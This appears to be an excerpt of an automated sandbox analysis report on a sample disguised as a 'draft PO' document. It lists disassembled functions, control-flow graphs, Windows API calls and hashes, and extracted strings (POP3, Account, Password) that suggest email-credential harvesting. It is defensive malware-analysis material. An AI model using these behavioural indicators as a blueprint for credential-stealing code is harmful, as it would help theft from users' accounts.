                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 9868401e285ded28d1a068919e0a2881d3f5b6af623d6d893f2df382723aea47
                                                                                • Instruction ID: 3fc0ef2a460e0bd1c28f0985a101fcb03116d928ebe235f6ede1bb12d2b8916e
                                                                                • Opcode Fuzzy Hash: 9868401e285ded28d1a068919e0a2881d3f5b6af623d6d893f2df382723aea47
                                                                                • Instruction Fuzzy Hash: 6CE08CB6401A08EFDF016F25DD88A697F2AFF82381F104024F9099B020CB35DC53DB48
                                                                                APIs
                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,341DB5BC,?,?,00000008,?,?,341DB25C,00000000), ref: 341DB7EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3997070919-0
                                                                                • Opcode ID: 21c9afd36d20ae0f6ec249d56ffc5006128649d18ab366d954673071ab023320
                                                                                • Instruction ID: a28ba7fafefe22fb2a029c8d6961a81d3d71797fb72629e277fc01647969d420
                                                                                • Opcode Fuzzy Hash: 21c9afd36d20ae0f6ec249d56ffc5006128649d18ab366d954673071ab023320
                                                                                • Instruction Fuzzy Hash: F1B14BB5610A099FD705CF28C4C6B667BE0FF46364F65869CE89ACF2A1C735E981CB40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: 20d7624fb8b7ef6d019f3d5cef2527f54e8beb2576ddc8eb5e1af0c87ffcaec3
                                                                                • Instruction ID: 7528ba4f51a6226d570f139129587f892a376d8762e4e08eeb6ed2f1f2af53a1
                                                                                • Opcode Fuzzy Hash: 20d7624fb8b7ef6d019f3d5cef2527f54e8beb2576ddc8eb5e1af0c87ffcaec3
                                                                                • Instruction Fuzzy Hash: 2DA011B0A02A02CF83008EB2820A20C3AACEA8228030800A8A808E0000EB2080A28B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                • Instruction ID: d967c3cf2aec3b1d6c6e0812a0cb8bd4bdcd753ea9f18e811a4bed339f0530df
                                                                                • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                • Instruction Fuzzy Hash: 6E62BD3A608B558FE314CF28C88066ABBF1FF89384F154A6DF9A48B350E771D585CB42

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 136 341d173a-341d17fe call 341dc030 call 341d2c40 * 2 143 341d1803 call 341d1cca 136->143 144 341d1808-341d180c 143->144 145 341d19ad-341d19b1 144->145 146 341d1812-341d1816 144->146 146->145 147 341d181c-341d1837 call 341d1ede 146->147 150 341d183d-341d1845 147->150 151 341d199f-341d19ac call 341d1ee7 * 2 147->151 153 341d184b-341d184e 150->153 154 341d1982-341d1985 150->154 151->145 153->154 155 341d1854-341d1881 call 341d44b0 * 2 call 341d1db7 153->155 157 341d1995-341d1999 154->157 158 341d1987 154->158 170 341d193d-341d1943 155->170 171 341d1887-341d189f call 341d44b0 call 341d1db7 155->171 157->150 157->151 161 341d198a-341d198d call 341d2c40 158->161 165 341d1992 161->165 165->157 172 341d197e-341d1980 170->172 173 341d1945-341d1947 170->173 171->170 187 341d18a5-341d18a8 171->187 172->161 173->172 175 341d1949-341d194b 173->175 177 341d194d-341d194f 175->177 178 341d1961-341d197c call 341d16aa 175->178 180 341d1955-341d1957 177->180 181 341d1951-341d1953 177->181 178->165 184 341d195d-341d195f 180->184 185 341d1959-341d195b 180->185 181->178 181->180 184->172 184->178 185->178 185->184 188 341d18aa-341d18c2 call 341d44b0 call 341d1db7 187->188 189 341d18c4-341d18dc call 341d44b0 call 341d1db7 187->189 188->189 198 341d18e2-341d193b call 341d16aa call 341d15da call 341d2c40 * 2 188->198 189->157 189->198 198->157
                                                                                APIs
                                                                                  • Part of subcall function 341D1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D1B
                                                                                  • Part of subcall function 341D1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 341D1D37
                                                                                  • Part of subcall function 341D1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D4B
                                                                                • _strlen.LIBCMT ref: 341D1855
                                                                                • _strlen.LIBCMT ref: 341D1869
                                                                                • _strlen.LIBCMT ref: 341D188B
                                                                                • _strlen.LIBCMT ref: 341D18AE
                                                                                • _strlen.LIBCMT ref: 341D18C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                • API String ID: 3296212668-3023110444
                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction ID: 9c8ee835b58301958e3fa263abc29094cf38b15c679ac0d8a2a4e5a32e7b2c66
                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction Fuzzy Hash: F861E4F5D00A18AFFF55CBA4C8C0BFEB7BAAF07204F40449AD504A7258EB745A46CB52

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                • API String ID: 4218353326-230879103
                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction ID: 97155c83f250c8e3eb5c618c6248385608e021e514f584103cab1b5f20db76c5
                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction Fuzzy Hash: 607116F5D00A689FEB119BA4C8C4AFEBBFD9F0A244F1040DAD548D7241E7749785CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3266236984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.3266213612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266261293.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266278879.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorModeVersionlstrlen
                                                                                • String ID: NSIS Error$UXTHEME
                                                                                • API String ID: 758611499-110662866
                                                                                • Opcode ID: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                • Instruction ID: a84716d26b240927f2f501cde0935ca932456bd970f48cf256b7861c77eac06c
                                                                                • Opcode Fuzzy Hash: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                                • Instruction Fuzzy Hash: FF218071500700ABD7207F61AE49B1B3AA8AB81705F01843FF981B62E2DF7D49558B6E

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 341d7cc2-341d7cd6 302 341d7cd8-341d7cdd 301->302 303 341d7d44-341d7d4c 301->303 302->303 306 341d7cdf-341d7ce4 302->306 304 341d7d4e-341d7d51 303->304 305 341d7d93-341d7dab call 341d7e35 303->305 304->305 307 341d7d53-341d7d90 call 341d571e * 4 304->307 313 341d7dae-341d7db5 305->313 306->303 309 341d7ce6-341d7ce9 306->309 307->305 309->303 312 341d7ceb-341d7cf3 309->312 314 341d7d0d-341d7d15 312->314 315 341d7cf5-341d7cf8 312->315 317 341d7dd4-341d7dd8 313->317 318 341d7db7-341d7dbb 313->318 320 341d7d2f-341d7d43 call 341d571e * 2 314->320 321 341d7d17-341d7d1a 314->321 315->314 319 341d7cfa-341d7d0c call 341d571e call 341d90ba 315->319 328 341d7dda-341d7ddf 317->328 329 341d7df0-341d7dfc 317->329 323 341d7dbd-341d7dc0 318->323 324 341d7dd1 318->324 319->314 320->303 321->320 326 341d7d1c-341d7d2e call 341d571e call 341d91b8 321->326 323->324 332 341d7dc2-341d7dd0 call 341d571e * 2 323->332 324->317 326->320 336 341d7ded 328->336 337 341d7de1-341d7de4 328->337 329->313 331 341d7dfe-341d7e0b call 341d571e 329->331 332->324 336->329 337->336 345 341d7de6-341d7dec call 341d571e 337->345 345->336
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 341D7D06
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D90D7
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D90E9
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D90FB
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D910D
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D911F
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D9131
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D9143
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D9155
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D9167
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D9179
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D918B
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D919D
                                                                                  • Part of subcall function 341D90BA: _free.LIBCMT ref: 341D91AF
                                                                                • _free.LIBCMT ref: 341D7CFB
                                                                                  • Part of subcall function 341D571E: HeapFree.KERNEL32(00000000,00000000,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?), ref: 341D5734
                                                                                  • Part of subcall function 341D571E: GetLastError.KERNEL32(?,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?,?), ref: 341D5746
                                                                                • _free.LIBCMT ref: 341D7D1D
                                                                                • _free.LIBCMT ref: 341D7D32
                                                                                • _free.LIBCMT ref: 341D7D3D
                                                                                • _free.LIBCMT ref: 341D7D5F
                                                                                • _free.LIBCMT ref: 341D7D72
                                                                                • _free.LIBCMT ref: 341D7D80
                                                                                • _free.LIBCMT ref: 341D7D8B
                                                                                • _free.LIBCMT ref: 341D7DC3
                                                                                • _free.LIBCMT ref: 341D7DCA
                                                                                • _free.LIBCMT ref: 341D7DE7
                                                                                • _free.LIBCMT ref: 341D7DFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: 58d17a849bd8d8a5c182574d7d6edbd8f14a118102bf120758b0f3e27fcc5441
                                                                                • Instruction ID: edf9935feb6f1986dd6286671378a2ec9438535c02ae7947971780966e4b3725
                                                                                • Opcode Fuzzy Hash: 58d17a849bd8d8a5c182574d7d6edbd8f14a118102bf120758b0f3e27fcc5441
                                                                                • Instruction Fuzzy Hash: 78313FF6600E04DFEB519A38D9C0B76B7EBEF02354F60559AE86AD7150DF31A880CB14

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _free.LIBCMT ref: 341D59EA
                                                                                  • Part of subcall function 341D571E: HeapFree.KERNEL32(00000000,00000000,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?), ref: 341D5734
                                                                                  • Part of subcall function 341D571E: GetLastError.KERNEL32(?,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?,?), ref: 341D5746
                                                                                • _free.LIBCMT ref: 341D59F6
                                                                                • _free.LIBCMT ref: 341D5A01
                                                                                • _free.LIBCMT ref: 341D5A0C
                                                                                • _free.LIBCMT ref: 341D5A17
                                                                                • _free.LIBCMT ref: 341D5A22
                                                                                • _free.LIBCMT ref: 341D5A2D
                                                                                • _free.LIBCMT ref: 341D5A38
                                                                                • _free.LIBCMT ref: 341D5A43
                                                                                • _free.LIBCMT ref: 341D5A51
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: fee9675eb46b6c151ac095043285522ad18e47623b1d3935eaaa327389c3fbf2
                                                                                • Instruction ID: 0386c1e54550bd511d9d9f078da7e8b0b19fb757170cec9f12a0e0b973e5d8bb
                                                                                • Opcode Fuzzy Hash: fee9675eb46b6c151ac095043285522ad18e47623b1d3935eaaa327389c3fbf2
                                                                                • Instruction Fuzzy Hash: F311E6BA120548FFDB91DF54C880CED3FB7EF05250FA552A1B9088F228DA32DA509B84

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D1B
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 341D1D37
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D4B
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D58
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D72
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D7D
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 341D1D8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 1454806937-0
                                                                                • Opcode ID: d14c6b2dfd0ab77dfc5f085d0374b5c147008cf8f8fe7501965caa8a97b29e49
                                                                                • Instruction ID: 06edbb4b8c6e5d37724677ae3bf7c91bee29f11d7c1b8cf92c15d938b1aa3a39
                                                                                • Opcode Fuzzy Hash: d14c6b2dfd0ab77dfc5f085d0374b5c147008cf8f8fe7501965caa8a97b29e49
                                                                                • Instruction Fuzzy Hash: 7C211DF1D42A1CEFE7109BA59CCCEFA7AACEB4A254F0005A5F515E2140D7709E468B74

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 402 341d9492-341d94ef GetConsoleCP 403 341d94f5-341d9511 402->403 404 341d9632-341d9644 call 341d2ada 402->404 406 341d952c-341d953d call 341d7c19 403->406 407 341d9513-341d952a 403->407 414 341d953f-341d9542 406->414 415 341d9563-341d9565 406->415 409 341d9566-341d9575 call 341d79e6 407->409 409->404 416 341d957b-341d959b WideCharToMultiByte 409->416 417 341d9609-341d9628 414->417 418 341d9548-341d955a call 341d79e6 414->418 415->409 416->404 420 341d95a1-341d95b7 WriteFile 416->420 417->404 418->404 424 341d9560-341d9561 418->424 422 341d95b9-341d95ca 420->422 423 341d962a-341d9630 GetLastError 420->423 422->404 425 341d95cc-341d95d0 422->425 423->404 424->416 426 341d95fe-341d9601 425->426 427 341d95d2-341d95f0 WriteFile 425->427 426->403 429 341d9607 426->429 427->423 428 341d95f2-341d95f6 427->428 428->404 430 341d95f8-341d95fb 428->430 429->404 430->426
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,341D9C07,?,00000000,?,00000000,00000000), ref: 341D94D4
                                                                                • __fassign.LIBCMT ref: 341D954F
                                                                                • __fassign.LIBCMT ref: 341D956A
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 341D9590
                                                                                • WriteFile.KERNEL32(?,?,00000000,341D9C07,00000000,?,?,?,?,?,?,?,?,?,341D9C07,?), ref: 341D95AF
                                                                                • WriteFile.KERNEL32(?,?,00000001,341D9C07,00000000,?,?,?,?,?,?,?,?,?,341D9C07,?), ref: 341D95E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 3c1961508661636e0d55d144901ea446dff9b057c3b717a8760de73c16f1c6fe
                                                                                • Instruction ID: d2b06864acaaea8095b459f351bd68e3fe357e6dc35cf9535c63bdb87c2289d1
                                                                                • Opcode Fuzzy Hash: 3c1961508661636e0d55d144901ea446dff9b057c3b717a8760de73c16f1c6fe
                                                                                • Instruction Fuzzy Hash: 6A51BEB5E10609AFDB00CFA8CC91AEEBBB8EF0A310F14455AE955E7281E7309951CF60

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 431 341d3370-341d33b5 call 341d3330 call 341d37a7 436 341d33b7-341d33c9 431->436 437 341d3416-341d3419 431->437 438 341d3439-341d3442 436->438 440 341d33cb 436->440 437->438 439 341d341b-341d3428 call 341d3790 437->439 443 341d342d-341d3436 call 341d3330 439->443 442 341d33d0-341d33e7 440->442 444 341d33fd 442->444 445 341d33e9-341d33f7 call 341d3740 442->445 443->438 448 341d3400-341d3405 444->448 453 341d340d-341d3414 445->453 454 341d33f9 445->454 448->442 449 341d3407-341d3409 448->449 449->438 452 341d340b 449->452 452->443 453->443 455 341d33fb 454->455 456 341d3443-341d344c 454->456 455->448 457 341d344e-341d3455 456->457 458 341d3486-341d3496 call 341d3774 456->458 457->458 460 341d3457-341d3466 call 341dbbe0 457->460 463 341d3498-341d34a7 call 341d3790 458->463 464 341d34aa-341d34c6 call 341d3330 call 341d3758 458->464 468 341d3468-341d3480 460->468 469 341d3483 460->469 463->464 468->469 469->458
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 341D339B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 341D33A3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 341D3431
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 341D345C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 341D34B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 51c8f5b81334efec09b360a0dc78594361f2326e1f3a9e7abaa27c5246a74358
                                                                                • Instruction ID: 55c51223280cad3125958897e5ada596214bc70acb3aca60faf680c852d92120
                                                                                • Opcode Fuzzy Hash: 51c8f5b81334efec09b360a0dc78594361f2326e1f3a9e7abaa27c5246a74358
                                                                                • Instruction Fuzzy Hash: F941A8F8E01A0CEFDB01CFA8C8C4AAEBBB5AF46324F508199D9155B351D735DA15CB90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 341D9221: _free.LIBCMT ref: 341D924A
                                                                                • _free.LIBCMT ref: 341D92AB
                                                                                  • Part of subcall function 341D571E: HeapFree.KERNEL32(00000000,00000000,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?), ref: 341D5734
                                                                                  • Part of subcall function 341D571E: GetLastError.KERNEL32(?,?,341D924F,?,00000000,?,00000000,?,341D9276,?,00000007,?,?,341D7E5A,?,?), ref: 341D5746
                                                                                • _free.LIBCMT ref: 341D92B6
                                                                                • _free.LIBCMT ref: 341D92C1
                                                                                • _free.LIBCMT ref: 341D9315
                                                                                • _free.LIBCMT ref: 341D9320
                                                                                • _free.LIBCMT ref: 341D932B
                                                                                • _free.LIBCMT ref: 341D9336
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3288710232.00000000341D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 341D0000, based on PE: true
                                                                                • Associated: 00000004.00000002.3288694438.00000000341D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3288710232.00000000341E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_341d0000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction ID: 9bbced6dfae2c66e1ad6ab507c2ac9700dd064877605b028740e159fd5d2e107
                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction Fuzzy Hash: 281181B1560F08FEE620ABB0DCC6FEB7B9F9F06700F800824A69976052DA24B5044B51
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                                • wsprintfW.USER32 ref: 00406653
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.3266236984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.3266213612.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266261293.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266278879.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000004.00000002.3266424996.0000000000815000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                • API String ID: 2200240437-1946221925
                                                                                • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                                • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,341D6FFD,00000000,?,?,?,341D8A72,?,?,00000100), ref: 341D887B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,341D8A72,?,?,00000100,5EFC4D8B,?,?), ref: 341D8901
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 341D89FB
                                                                                • __freea.LIBCMT ref: 341D8A08
                                                                                  • Part of subcall function 341D56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 341D5702
                                                                                • __freea.LIBCMT ref: 341D8A11
                                                                                • __freea.LIBCMT ref: 341D8A36
                                                                                Memory Dump Source
